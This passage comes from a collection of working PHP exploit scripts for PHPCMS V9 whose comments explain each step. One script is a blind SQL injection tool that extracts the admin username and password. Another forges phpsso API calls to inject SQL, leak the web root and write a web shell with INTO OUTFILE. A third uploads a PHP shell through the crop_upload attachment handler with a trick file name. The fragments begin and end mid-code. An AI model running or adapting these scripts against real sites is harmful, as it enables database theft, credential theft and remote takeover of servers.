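            $pos++;
            continue;
        }
        if (exploit($hostname, $path, $pos, $key[$chr], $chs)) {
            echo $key[$chr];
            $chr = 0;
            $pos++;
        } else {
            $chr++;
        }
    }
    echo "\n\n";
}

/**
 * Find the username length by probing 0, 1, 2, ... until one matches.
 *
 * Bounded at 255 so an unreachable or non-vulnerable host cannot make the
 * loop run forever (the original had no upper bound); 0 is returned when
 * nothing matched.
 *
 * @param string $hostname target host
 * @param string $path     application path
 * @param int    $chs      probe kind (3 = length)
 * @return int
 */
function lengthcolumns($hostname, $path, $chs)
{
    echo "[+] username length: ";
    $length = 0;
    $pos = 0;
    $chr = 0; // unused by the length probe; passed through as before
    while ($pos <= 255) {
        if (exploit($hostname, $path, $pos, $chr, $chs)) {
            $length = $pos;
            break;
        }
        $pos++;
    }
    echo $length . "\n";
    return $length;
}

/**
 * Learn the table prefix from the error page produced by `where=#`.
 *
 * The response is expected to echo the failing SQL; the text before
 * "yp_product" in "FROM `...yp_product" is the prefix.
 *
 * @param string $hostname target host
 * @param string $path     application path
 * @return string|false prefix, or false when it could not be read
 */
function getprefix($hostname, $path)
{
    echo "[+] prefix: ";
    $conn = fsockopen($hostname, 80, $errno, $errstr, 10);
    if (!$conn) {
        return false;
    }
    $request = "GET {$path}/product.php?q=&action=searchlist&where=%23 HTTP/1.1\r\n";
    $request .= "Host: {$hostname}\r\n";
    $request .= "Connection: Close\r\n\r\n";
    fputs($conn, $request);
    $reply = ''; // the original appended to an undefined variable
    while (!feof($conn)) {
        $reply .= fgets($conn, 1024);
    }
    fclose($conn);
    // The original pattern carried an 'e' modifier, which has no meaning for
    // preg_match and is rejected outright on PHP 7+ (the match then always
    // fails). Non-greedy capture so a later "yp_product" on the same line
    // cannot widen the prefix.
    if (preg_match('/FROM `(.+?)yp_product/i', $reply, $match) && $match[1] !== '') {
        return $match[1];
    }
    return false;
}

if ($argc != 3) {
    usage();
}
$prefix = "";
$hostname = $argv[1];
$path = $argv[2];
$prefix = getprefix($hostname, $path);
if ($prefix) {
    echo $prefix . "\r\n";
    $length = lengthcolumns($hostname, $path, 3);
    crkusername($hostname, $path, 1);
    crkpassword($hostname, $path, 2);
} else {
    exit("Exploit failed");
}
?>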
```
# phpcmsV9_uc_SQL.php
```
126 ))
{$result.=” .”;}
else
{$result.=” “.$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=” “.dechex(ord($string[$i]));}
else
{$exa.=” 0″.dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.=”\r\n”; $exa.=”\r\n”;}
}
return $exa.”\r\n”.$result;
}
// Accepted -P value: dotted IPv4 and a port, e.g. 127.0.0.1:8080. The
// parentheses double as the PCRE delimiters.
$proxy_regex = "(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)";

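/**
 * Send a raw HTTP packet to the target (directly or via the -P proxy) and
 * store the full response in the global $html.
 *
 * @param string $packet complete request, headers terminated by a blank line
 */
function send($packet)
{
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy == '') {
        $ock = fsockopen(gethostbyname($host), $port, $errno, $errstr, 10);
        if (!$ock) {
            echo 'No response from ' . $host . ':' . $port;
            die;
        }
    } else {
        if (!preg_match($proxy_regex, $proxy)) {
            echo 'Not a valid proxy...';
            die;
        }
        $parts = explode(':', $proxy);
        $parts[1] = (int)$parts[1];
        echo "Connecting to " . $parts[0] . ":" . $parts[1] . " proxy...\r\n";
        $ock = fsockopen($parts[0], $parts[1], $errno, $errstr, 10);
        if (!$ock) {
            echo 'No response from proxy...';
            die;
        }
    }
    // Read timeout: the original had none and could block forever.
    stream_set_timeout($ock, 30);
    fputs($ock, $packet);
    // Read to EOF for both paths. The original proxy loop used eregi(),
    // which no longer exists on PHP 7+, and kept looping after EOF until a
    // blank line had been seen -- an infinite loop on a header-less reply.
    $html = '';
    while (!feof($ock)) {
        $chunk = fread($ock, 1024);
        if ($chunk === '' || $chunk === false) {
            $meta = stream_get_meta_data($ock);
            if ($meta['timed_out']) {
                break;
            }
            continue;
        }
        $html .= $chunk;
    }
    fclose($ock);
}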

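// Command line: host, path, then optional -pPORT and -Phost:port switches
// (the value is glued to the switch, e.g. -p8080).
if ($argc < 3) {
    echo 'Usage: php ' . $argv[0] . " host /path/ [-pPORT] [-Phost:port]\r\n";
    die;
}
$host = $argv[1];
$path = $argv[2];
$port = 80;
$proxy = "";
for ($i = 3; $i < $argc; $i++) {
    // substr() instead of $argv[$i][0].$argv[$i][1]: no notice on a 1-char arg.
    $temp = substr($argv[$i], 0, 2);
    if ($temp == "-p") {
        $port = (int)substr($argv[$i], 2);
    }
    if ($temp == "-P") {
        $proxy = substr($argv[$i], 2);
    }
}
// The path must start and end with '/': it is concatenated directly with
// "phpsso_server/..." below.
if ($path[0] != '/' || $path[strlen($path) - 1] != '/') {
    echo 'Error... check the path!';
    die;
}
// Through a proxy the request line must carry the absolute URL.
if ($proxy == '') {
    $p = $path;
} else {
    $p = 'http://' . $host . ':' . $port . $path;
}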

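/**
 * UCenter/Discuz-style authcode(): reversible keyed encoding of $string.
 *
 * Keys are md5 digests derived from $key; $keyc is a 4-character per-message
 * salt (taken from the ciphertext on DECODE, from md5(microtime()) on
 * ENCODE). The two loops are an RC4-style key schedule and keystream/XOR
 * pass. The plaintext is prefixed with a 10-digit expiry (0 = never) and a
 * 16-hex-char md5 tag over plaintext.$keyb, which DECODE checks before
 * returning the payload; '' signals failure. ENCODE output is
 * $keyc . base64(ciphertext) with '=' padding stripped.
 *
 * This exploit calls it with an EMPTY key (see the call sites below): the
 * forged API call is only accepted if the target's uc.php uses that same
 * default key, which is the assumption the whole script rests on.
 *
 * Restored from a garbled listing (curly quotes, collapsed lines); the logic
 * is unchanged, including the loose `== 0` expiry comparison.
 *
 * @param string $string    plaintext (ENCODE) or code (DECODE)
 * @param string $operation 'ENCODE' or 'DECODE'
 * @param string $key       shared key
 * @param int    $expiry    lifetime in seconds, 0 = no expiry (ENCODE only)
 * @return string
 */
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0)
{
    $ckey_length = 4;

    $key = md5($key ? $key : '');
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';

    $cryptkey = $keya . md5($keya . $keyc);
    $key_length = strlen($cryptkey);

    // DECODE: strip the salt and un-base64. ENCODE: prepend expiry + tag.
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
    $string_length = strlen($string);

    $result = '';
    $box = range(0, 255);

    $rndkey = array();
    for ($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }

    // Key schedule: permute $box under $rndkey.
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }

    // Keystream generation XORed onto the input byte by byte.
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }

    if ($operation == 'DECODE') {
        // Accept when not expired and the 16-char tag matches the payload.
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc . str_replace('=', '', base64_encode($result));
    }
}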

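/**
 * Build the minimal HTTP/1.0 GET every step of this script sends; send()
 * stores the response in $html.
 *
 * @param string $host           Host header value
 * @param string $request_target path (or absolute URL when proxied)
 * @return string raw request
 */
function uc_get_packet($host, $request_target)
{
    $packet = "GET " . $request_target . " HTTP/1.0\r\n";
    $packet .= "User-Agent: Mozilla/5.0\r\n";
    $packet .= "Host: " . $host . "\r\n";
    $packet .= "Connection: Close\r\n\r\n";
    return $packet;
}

// Step 1 -- probe. The API parameters are wrapped with authcode() under an
// EMPTY key: everything below relies on the target's phpsso uc.php accepting
// codes made with that default key. The oversized time= value presumably
// satisfies uc.php's own freshness check; a stray quote in ids= should then
// surface a MySQL error.
$uc_api = $p . "phpsso_server/api/uc.php?code=";
$SQL = "time=999999999999999999999999&ids=1'&action=deleteuser";
$SQL = urlencode(authcode($SQL, "ENCODE", ""));
echo "[1] 访问 http://" . $host . $uc_api . $SQL . "\n";
send(uc_get_packet($host, $uc_api . $SQL));
if (strpos($html, "MySQL Errno") === false) {
    echo "[*]不存在SQL注入漏洞" . "\n";
} else {
    echo "[2] 发现存在SQL注入漏洞" . "\n";
    // Step 2 -- leak the web root: logout.php's error output is expected to
    // contain an absolute filesystem path ending in .../phpsso_server/.
    echo "[3] 访问 http://" . $host . $p . "phpsso_server/api/logout.php \n";
    send(uc_get_packet($host, $p . "phpsso_server/api/logout.php"));
    preg_match('/[A-Za-z]?[:]?[\/\x5c][^<^>]+[\/\x5c]phpsso_server[\/\x5c]/', $html, $matches);
    //print_r($matches);
    if (empty($matches)) {
        echo "[-]未取到web路径 :(";
    } else {
        $webroot = str_replace("\\", "/", $matches[0]); // forward slashes for the SQL literal
        echo "[4] 得到web路径 " . $matches[0] . "\n";
        echo "[5] 尝试写入文件 " . $webroot . "caches/shell.php" . "\n";
        // Step 3 -- UNION ... INTO OUTFILE to drop a file under caches/.
        // NOTE(review): the PHP one-liner selected here was stripped when this
        // listing was rendered -- only an empty '' literal survives, so as shown
        // this writes an empty file. Step 4 expects it to eval the `a` GET
        // parameter (the final message calls "a" the shell password).
        $SQL = "time=999999999999999999999999&ids=1)";
        $SQL .= " and 1=2 union select '' into outfile '" . $webroot . "caches/shell.php'#";
        $SQL .= "&action=deleteuser";
        $SQL = urlencode(authcode($SQL, "ENCODE", ""));
        echo "[6] 访问 http://" . $host . $uc_api . $SQL . "\n";
        send(uc_get_packet($host, $uc_api . $SQL));
        if (strpos($html, "Access denied") !== false) {
            // INTO OUTFILE requires the FILE privilege on the DB account.
            echo "[-] MYSQL权限过低 禁止写入文件 :(";
            die;
        }
        // Step 4 -- verify by running phpinfo() through the dropped file.
        echo "[6] 访问 http://" . $host . $p . "phpsso_server/caches/shell.php" . "\n";
        send(uc_get_packet($host, $p . "phpsso_server/caches/shell.php?a=phpinfo();"));
        if (strpos($html, "phpinfo()") !== false) {
            echo "[7] 测试phpinfo成功!shell密码是a ! enjoy it :)";
        }
    }
}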

?>
```
# PHPCMSV9-GetShell.py
```
‘;

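// Upload name carrying the extension trick this exploit depends on: a ".Php"
// in the middle, then ".JPG", seven URL-encoded spaces and a final "Php".
// The Server-header check below suggests it relies on Apache's handling of
// such names; that cannot be verified from this listing.
$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';

if ($ret = Create_dir($url, $path)) {
    //echo $ret;
    // Refuse non-Apache targets, judged from the Server header of the reply.
    $pattern = "|Server:[^,]+?|U";
    preg_match_all($pattern, $ret, $matches);
    if (!empty($matches[0][0])) {
        // The original compared with `== false`, so a header whose match
        // starts with "Apache" at offset 0 was treated as "not Apache".
        if (strpos($matches[0][0], 'Apache') === false) {
            echo "\n亲!此网站不是apache的网站。\n";
            exit;
        }
    }

    $ret = GetShell($url, $phpshell, $path, $file);

    // The crop_upload reply is expected to echo where the file was stored,
    // either as a full URL or as a /uploadfile/... path; the same tail the
    // upload name carried is appended to reach the written file.
    $tail = 'JPG%20%20%20%20%20%20%20Php';
    $pattern = "|http:\/\/[^,]+?\.,?|U";
    preg_match_all($pattern, $ret, $matches);
    if (!empty($matches[0][0])) {
        echo "\n" . '密码为: ' . $pass . "\n";
        echo "\r\nurl地址: " . $matches[0][0] . $tail . "\n";
        exit;
    }

    $pattern = "|\/uploadfile\/[^,]+?\.,?|U";
    preg_match_all($pattern, $ret, $matches);
    if (!empty($matches[0][0])) {
        echo "\n" . '密码为: ' . $pass . "\n";
        echo "\r\nurl地址:" . 'http://' . $url . $path . $matches[0][0] . $tail . "\n";
        exit;
    }

    echo "\r\n没得到!\n";
    exit;
}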

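/**
 * POST the shell source to crop_upload and return the raw HTTP response.
 *
 * The POST body is $shell; the file= parameter names a URL on the target
 * itself under /uploadfile/ using the trick filename $js. The caller greps
 * the response for the stored file's location.
 *
 * @param string $url   target host
 * @param string $shell PHP source to upload
 * @param string $path  application path
 * @param string $js    upload filename (see $file in the caller)
 * @return string raw response
 */
function GetShell($url, $shell, $path, $js)
{
    $content = $shell;
    $data = "POST " . $path . "/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://" . $url . $path . "/uploadfile/" . $js . " HTTP/1.1\r\n";
    $data .= "Host: " . $url . "\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
    $data .= "Connection: close\r\n";
    // Content-Length covers $content only; the CRLF appended after the body
    // is outside it and ignored by the server (kept as in the original).
    $data .= "Content-Length: " . strlen($content) . "\r\n\r\n";
    $data .= $content . "\r\n";

    // Connect and read timeouts: the original could block indefinitely.
    $ock = fsockopen($url, 80, $errno, $errstr, 10);
    if (!$ock) {
        echo "\n" . "此网站没有回应,检测url是否输入正确" . "\n";
        exit;
    }
    stream_set_timeout($ock, 30);
    fwrite($ock, $data);
    $resp = '';
    while (!feof($ock)) {
        $chunk = fread($ock, 1024);
        if ($chunk === '' || $chunk === false) {
            $meta = stream_get_meta_data($ock);
            if ($meta['timed_out']) {
                break;
            }
            continue;
        }
        $resp .= $chunk;
    }
    fclose($ock); // the original never closed the socket
    return $resp;
}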

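/**
 * Preliminary crop_upload POST; returns the raw HTTP response.
 *
 * Judging by its name it exists to make the target create its upload
 * directory; the caller only inspects the Server header of the reply. Note
 * that file= points at a third-party host (lanu.sinaapp.com), so the target
 * is made to fetch an external URL: this leaks the target to that host and
 * the step depends on that host still serving the image.
 *
 * @param string $url  target host
 * @param string $path application path
 * @return string raw response
 */
function Create_dir($url, $path = '')
{
    $content = 'I love you';
    $data = "POST " . $path . "/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";
    $data .= "Host: " . $url . "\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
    $data .= "Connection: close\r\n";
    // Content-Length covers $content only; the trailing CRLF is outside it
    // and ignored by the server (kept as in the original).
    $data .= "Content-Length: " . strlen($content) . "\r\n\r\n";
    $data .= $content . "\r\n";

    // Connect and read timeouts: the original could block indefinitely.
    $ock = fsockopen($url, 80, $errno, $errstr, 10);
    if (!$ock) {
        echo "\n" . "此网站没有回应,检测url是否输入正确" . "\n";
        exit;
    }
    stream_set_timeout($ock, 30);
    fwrite($ock, $data);
    $resp = '';
    while (!feof($ock)) {
        $chunk = fread($ock, 1024);
        if ($chunk === '' || $chunk === false) {
            $meta = stream_get_meta_data($ock);
            if ($meta['timed_out']) {
                break;
            }
            continue;
        }
        $resp .= $chunk;
    }
    fclose($ock); // the original never closed the socket
    return $resp;
}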

?>
```
